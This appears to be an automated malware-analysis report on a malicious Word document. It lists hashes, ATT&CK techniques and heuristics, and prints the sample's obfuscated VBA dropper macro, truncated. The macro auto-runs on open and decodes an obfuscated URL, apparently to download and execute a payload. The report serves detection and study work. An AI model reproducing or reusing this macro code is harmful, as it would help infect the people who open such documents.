Office (OLE) malware analysis — malicious · 5d02eacf13bf54b1

MALICIOUS

Office (OLE)

90.5 KB Created: 2016-05-30 01:17:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: f4fef5c7297651e252ad1e3fb8ceedfd SHA-1: 06d5f7109adb286f3b25d5d0021fd99322a6301a SHA-256: 5d02eacf13bf54b142d95b0408ea7213fa513685eca598b6b8ce2ef8f64ccb55

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate

The sample contains a VBA macro that is automatically executed upon opening the document, indicated by the Document_Open and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The macro employs obfuscation and uses CreateObject and CallByName functions, suggesting it's designed to download and execute a secondary payload. The presence of a macro-enable lure further supports this malicious intent.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15770 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15770 bytes
SHA-256: `4f327a332d825c45652737392b569161ba1b3b5f026a144e0c3ffc29cdb67ada`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function OEMWfnTNzNAa(ByVal kEmNZLn As String, ByVal pUQDO As String) As Integer lNWbDXPZykQjnC xYGCrAfNU = 6891 aIazdevr 4165 yPsCNPssGyiOpN 7578, "QLjTiJyxkvHq3D3xoJ" If NjIyodZJSVmYfi Then qmIeR "Tc5GTfIJ7DdJykponF2TvjzdnDdkq5", True, "CR5nll4nqHu2yZ3XoSjvZjPprOKLz" WEWJNBAlbfoeL "75yJtcASgwEAVWYHBzmb1UceE92k8L", True DAUosIn Else CcVIZQDGBz 1146 End If OEMWfnTNzNAa = 5291 End Function Private Sub hKqOqK(ByVal IfkvY As String, ByVal isEBabzjVW As Integer) TeWBtwRjPIlabt "EBZ4lSC8U8cOT4AXXC1KYoAir3H", 5222, True eChsuJzQdyZ sfYHcObVOTvE 7063 End Sub Private Function uCazxXMenr() As String If oOHmni Then NwkbshfERc Else YMGoUeYFXwuwr 2523 End If uCazxXMenr = "1T251UeVLs4ojGYnZX" End Function Private Sub Document_Open() Dim QuVBLoFVmJ As String rdYkMVXOybK = 5132 ZTRLmRY.IeltIyKRyTF End Sub Private Function HVptOfWeqFdD(ByVal ibPzahNpHBa As Integer, ByVal cVprSeCGn As String) As Boolean ELqtEE 564, 1218, "fYhSanXTOsUyz4G11" Wujyauj = 5855 LbiswoA 1901, "FZeNvsNzHi9n0IXHl5qfOQMlvIv" PjwNogbxKJYdhp 7473 AIgTVkicIiowa 238, "jQ2RCZ3flRQoFBoeBw", "csxxOj5E4fAkaVs3SIm6hCznES74xLf" HVptOfWeqFdD = False End Function Attribute VB_Name = "ZTRLmRY" Private Sub HfqHLHZbDWXG() Dim igRuTIDG As Integer tkkycPmxl = 7110 LUmzLGgdHt zmAFY.xCgUgpbq, 1503, zuyIhzjGWMJA zmAFY.LtQQqEcNTgunYW zmAFY.xCgUgpbq End Sub Public Sub IeltIyKRyTF() OXCJNgpDtFM = 4891 On Error GoTo ymplNbbZN NanxJOZRPgXjf.yUYnKpy NanxJOZRPgXjf.LInuQiCINRGQ HfqHLHZbDWXG Exit Sub ymplNbbZN: End Sub Private Sub LUmzLGgdHt(ByVal PmvDNPhbtLk As String, ByVal hbOnwg As Integer, ByVal GqfmFq As String) Dim DVrCCocfjsOyZm As Integer Set OSuWuqT = SUmbbGJsrQGlCr.BIQbSq("7DAiIjyApsFWR2b9rd6tCgQ9hzmH", GqfmFq, "jQy98rK5A8fEjlnT1Uad84cFxu") SUmbbGJsrQGlCr.CkIEnCkFfLK OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj") zmAFY.equhCgWhZp PmvDNPhbtLk, JwYwcNCOgCBwx.RJkrOlROSrZNDx(OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q")) End Sub Public Function NeTnC(ByVal NyEjjJOeppzvOE As String, ByVal sdTFLdHw As String) As Object Dim pXNhOhhlfvQYW As String Dim JvrVRRrIkDqj As String Set NeTnC = tvuwZWCvZhgWlH(CreateObject(sdTFLdHw), False, False) End Function Private Function tvuwZWCvZhgWlH(ByVal jEvgfVKxGMtEx As Object, ByVal dNBIYwL As Boolean, ByVal LPleCMTEk As Boolean) As Object Set tvuwZWCvZhgWlH = jEvgfVKxGMtEx End Function Private Function zuyIhzjGWMJA() As String zuyIhzjGWMJA = gAdcATNCVnZS.PgkLSbQzzWryIn("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML") End Function Attribute VB_Name = "gAdcATNCVnZS" Public Function PgkLSbQzzWryIn(ByVal gwLgQ As String, ByVal tPCdqy As String) As String Dim VqVNGbMrhz As Boolean For fQwLCKC = mwYnHDX To cXfrU.zcNPzc("JKfPgfJhcKHSbEEA3HLGz9GFQINRMJRh6", gwLgQ) PgkLSbQzzWryIn = cXfrU.QQoki("qokImbaq3kdd6keZ5NeloJVNPe", PgkLSbQzzWryIn, 8054, xurZbHiOIAcCvh(tPCdqy, cXfrU.wVpDPwrVlS(fQwLCKC, "T2uCee33zvXfolvMcgj", gwLgQ))) Next End Function Private Sub kJWXGQFTW(ByVal QYURU As Boolean) kWQntlSa = "gATjq1CKBKYu2LCuoJRy9mx" VXJfqbSP 4633, "IvO70p0tZ3UKYSdyaDugrW" zVAAaHy "wv0kZZuOdF1BBAGfSSqHZB", "foSqSLxBXhwpwpMiHz3R", "ETu5lDkIFxmfvJW2OEpU" YBsWLiizT = False jRWGpPV "9OsV7vnTWiDU1mgggGLiMXW8WWs" OtEdnsXfbIU 7882 wYMGZVuWWXY = 779 HfkDIKvuOvNV End Sub Private Sub PdXPfFkfboaF() If qlgQJwp Then NRIoJ NtQSYMjGdrJNEM = "ldlQ19QhOknTinh7hhONPTc3" End If End Sub Private Function xurZbHiOIAcCvh(ByVal OGbCxSQtjvXeL As String, ByVal eLOWeelSAhD As String) As String Dim rawcsCuVbm As Integer Dim qOunYEyoWN As String If Not cXfrU.JdYJTAZ(eLOWeelSAhD, "Ui08UAFZHvMTWDh4YUo", OGbCxSQtjvXeL, 4638) Then xurZbHiOIAcCvh = eLOWeelSAhD End If End Function ... (truncated)

SHA-256: 4f327a332d825c45652737392b569161ba1b3b5f026a144e0c3ffc29cdb67ada

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function OEMWfnTNzNAa(ByVal kEmNZLn As String, ByVal pUQDO As String) As Integer
lNWbDXPZykQjnC
xYGCrAfNU = 6891
aIazdevr 4165
yPsCNPssGyiOpN 7578, "QLjTiJyxkvHq3D3xoJ"
If NjIyodZJSVmYfi Then
qmIeR "Tc5GTfIJ7DdJykponF2TvjzdnDdkq5", True, "CR5nll4nqHu2yZ3XoSjvZjPprOKLz"
WEWJNBAlbfoeL "75yJtcASgwEAVWYHBzmb1UceE92k8L", True
DAUosIn
Else
CcVIZQDGBz 1146
End If
OEMWfnTNzNAa = 5291
End Function
Private Sub hKqOqK(ByVal IfkvY As String, ByVal isEBabzjVW As Integer)
TeWBtwRjPIlabt "EBZ4lSC8U8cOT4AXXC1KYoAir3H", 5222, True
eChsuJzQdyZ
sfYHcObVOTvE 7063
End Sub
Private Function uCazxXMenr() As String
If oOHmni Then
NwkbshfERc
Else
YMGoUeYFXwuwr 2523
End If
uCazxXMenr = "1T251UeVLs4ojGYnZX"
End Function
Private Sub Document_Open()
Dim QuVBLoFVmJ As String
rdYkMVXOybK = 5132
ZTRLmRY.IeltIyKRyTF
End Sub
Private Function HVptOfWeqFdD(ByVal ibPzahNpHBa As Integer, ByVal cVprSeCGn As String) As Boolean
ELqtEE 564, 1218, "fYhSanXTOsUyz4G11"
Wujyauj = 5855
LbiswoA 1901, "FZeNvsNzHi9n0IXHl5qfOQMlvIv"
PjwNogbxKJYdhp 7473
AIgTVkicIiowa 238, "jQ2RCZ3flRQoFBoeBw", "csxxOj5E4fAkaVs3SIm6hCznES74xLf"
HVptOfWeqFdD = False
End Function

Attribute VB_Name = "ZTRLmRY"
Private Sub HfqHLHZbDWXG()
Dim igRuTIDG As Integer
tkkycPmxl = 7110
LUmzLGgdHt zmAFY.xCgUgpbq, 1503, zuyIhzjGWMJA
zmAFY.LtQQqEcNTgunYW zmAFY.xCgUgpbq
End Sub
Public Sub IeltIyKRyTF()
OXCJNgpDtFM = 4891
On Error GoTo ymplNbbZN
NanxJOZRPgXjf.yUYnKpy
NanxJOZRPgXjf.LInuQiCINRGQ
HfqHLHZbDWXG
Exit Sub
ymplNbbZN:
End Sub
Private Sub LUmzLGgdHt(ByVal PmvDNPhbtLk As String, ByVal hbOnwg As Integer, ByVal GqfmFq As String)
Dim DVrCCocfjsOyZm As Integer
Set OSuWuqT = SUmbbGJsrQGlCr.BIQbSq("7DAiIjyApsFWR2b9rd6tCgQ9hzmH", GqfmFq, "jQy98rK5A8fEjlnT1Uad84cFxu")
SUmbbGJsrQGlCr.CkIEnCkFfLK OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
zmAFY.equhCgWhZp PmvDNPhbtLk, JwYwcNCOgCBwx.RJkrOlROSrZNDx(OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function NeTnC(ByVal NyEjjJOeppzvOE As String, ByVal sdTFLdHw As String) As Object
Dim pXNhOhhlfvQYW As String
Dim JvrVRRrIkDqj As String
Set NeTnC = tvuwZWCvZhgWlH(CreateObject(sdTFLdHw), False, False)
End Function
Private Function tvuwZWCvZhgWlH(ByVal jEvgfVKxGMtEx As Object, ByVal dNBIYwL As Boolean, ByVal LPleCMTEk As Boolean) As Object
Set tvuwZWCvZhgWlH = jEvgfVKxGMtEx
End Function
Private Function zuyIhzjGWMJA() As String
zuyIhzjGWMJA = gAdcATNCVnZS.PgkLSbQzzWryIn("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function

Attribute VB_Name = "gAdcATNCVnZS"
Public Function PgkLSbQzzWryIn(ByVal gwLgQ As String, ByVal tPCdqy As String) As String
Dim VqVNGbMrhz As Boolean
For fQwLCKC = mwYnHDX To cXfrU.zcNPzc("JKfPgfJhcKHSbEEA3HLGz9GFQINRMJRh6", gwLgQ)
PgkLSbQzzWryIn = cXfrU.QQoki("qokImbaq3kdd6keZ5NeloJVNPe", PgkLSbQzzWryIn, 8054, xurZbHiOIAcCvh(tPCdqy, cXfrU.wVpDPwrVlS(fQwLCKC, "T2uCee33zvXfolvMcgj", gwLgQ)))
Next
End Function
Private Sub kJWXGQFTW(ByVal QYURU As Boolean)
kWQntlSa = "gATjq1CKBKYu2LCuoJRy9mx"
VXJfqbSP 4633, "IvO70p0tZ3UKYSdyaDugrW"
zVAAaHy "wv0kZZuOdF1BBAGfSSqHZB", "foSqSLxBXhwpwpMiHz3R", "ETu5lDkIFxmfvJW2OEpU"
YBsWLiizT = False
jRWGpPV "9OsV7vnTWiDU1mgggGLiMXW8WWs"
OtEdnsXfbIU 7882
wYMGZVuWWXY = 779
HfkDIKvuOvNV
End Sub
Private Sub PdXPfFkfboaF()
If qlgQJwp Then
NRIoJ
NtQSYMjGdrJNEM = "ldlQ19QhOknTinh7hhONPTc3"
End If
End Sub
Private Function xurZbHiOIAcCvh(ByVal OGbCxSQtjvXeL As String, ByVal eLOWeelSAhD As String) As String
Dim rawcsCuVbm As Integer
Dim qOunYEyoWN As String
If Not cXfrU.JdYJTAZ(eLOWeelSAhD, "Ui08UAFZHvMTWDh4YUo", OGbCxSQtjvXeL, 4638) Then
xurZbHiOIAcCvh = eLOWeelSAhD
End If
End Function
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.